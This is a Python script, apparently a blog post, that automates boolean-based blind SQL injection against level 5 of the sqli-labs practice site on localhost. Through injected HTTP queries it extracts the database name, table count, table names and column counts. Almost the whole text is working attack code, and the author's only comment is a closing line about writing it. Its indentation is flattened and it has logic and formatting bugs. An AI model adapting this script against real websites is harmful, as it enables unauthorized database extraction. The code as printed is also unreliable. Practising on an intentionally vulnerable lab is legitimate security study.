import requests
db_length=1
db_url=''
db_place=1
db_name=''
db_ascii=1
print("猜解数据库长度")
url="http://127.0.0.1/sqli-labs-master/less-5/?id=1'"
for db_length in range(1,100):
db_url=url+'and %d=(select length(database()))--+'%(db_length)
r=requests.get(db_url)
if 'You are in...........' in r.text:
print('[!] '+db_url)
print('猜解结束')
break
else:
print('[x] '+db_url)
print('数据库名长度:%d'%(db_length))
print("-----------------------")
print('猜解数据库名称')
db_urlname=url+'and %d=(ascii(substr(database(),%d,1)))--+'%(db_ascii,db_place)
for db_place in range(1,db_length+1):
for db_ascii in range(0,127):
db_urlname=url+'and %d=(ascii(substr(database(),%d,1)))--+'%(db_ascii,db_place)
print(db_urlname)
r = requests.get(db_urlname)
if 'You are in...........' in r.text:
db_name=db_name+chr(db_ascii)
print('[!]'+db_name)
break
else:
continue
print('数据库的名称是:'+db_name)
print("------------------------")
print('猜解表的个数')
tb_urlname=''
tb_url=''
tb_number=1
for tb_number in range(1,10):
tb_url=url+'and %d=(select count(table_name) from information_schema.tables where table_schema=database())--+'%(tb_number)
r = requests.get(tb_url)
if'You are in...........' in r.text:
print('[!]'+tb_url)
break
else:
print('[x]'+tb_url)
print('表的数目是=%d'%(tb_number))
print("-------------------------")
print("猜解每个表的长度")
tb_lengthurl=''
tb_namelength=1
tb_num1=0
tb_array=[]
for tb_num1 in range(0,tb_number+1):
for tb_namelength in range(1,20):
tb_lengthurl = url + 'and %d=length((select concat(table_name)from information_schema.tables where table_schema=database() limit %d,1))--+' % (tb_namelength,tb_num1)
r = requests.get(tb_lengthurl)
if 'You are in...........' in r.text:
tb_array.append(tb_namelength)
print('[!] %d'%(tb_namelength)+ '>>%s'%(tb_lengthurl))
tb_namelength=0
break
else:
print('[x]' + tb_lengthurl)
continue
for i in range(0,len(tb_array)):
print("第%d个表的长度:%d"%(i+1,tb_array[i]))
print("--------------------------")
print("猜解每个表的名字")
tb_name=''
tb_nameurl=''
tb_num2=0
tb_length=1
tb_nameasci=1
tb_arrayname=[]
for tb_num2 in range(0,tb_number):
for tb_length in range(1,tb_array[tb_num2]):
for tb_nameasci in range(95,128):
tb_nameurl=url+'and %d=(ascii(substr((select concat(table_name)from information_schema.tables where table_schema=database() limit %d,1),%d,1)))--+'%(tb_nameasci,tb_num2,tb_length)
r = requests.get(tb_nameurl)
if'You are in...........' in r.text:
tb_name=tb_name+chr(tb_nameasci)
print('[!]'+tb_nameurl)
print(tb_name)
break
else:
print('[x]'+tb_nameurl)
continue
tb_arrayname.append(tb_name)
for i in range(0,tb_number):
print('第%d个表的名字:%s' % ((i+1),tb_arrayname[i]))
print("----------------------------")
print("猜解每个表中列的个数")
cb_url=''
cb_sum=0
cb_array=[]
for tb_num2 in range(1,tb_number):
for i in range(1,10):
cb_url=url+"and %d=(select count(column_name)from information_schema.columns where table_name='%s')--+"%(i,tb_arrayname[tb_num2])
r=requests.get(cb_url)
if 'You are in...........' in r.text:
cb_array.append(i)
print('[!]'+cb_url)
break
else:
continue
for tb_num2 in range(1,tb_number):
print('%s表的列数是:'%(tb_arrayname[tb_num2-1],cb_array[tb_num2-1]))
print('-----------------------------')
这是对付sqli-labs less5 的盲注python脚本(不懂,写了好久)
最新推荐文章于 2022-05-11 20:19:11 发布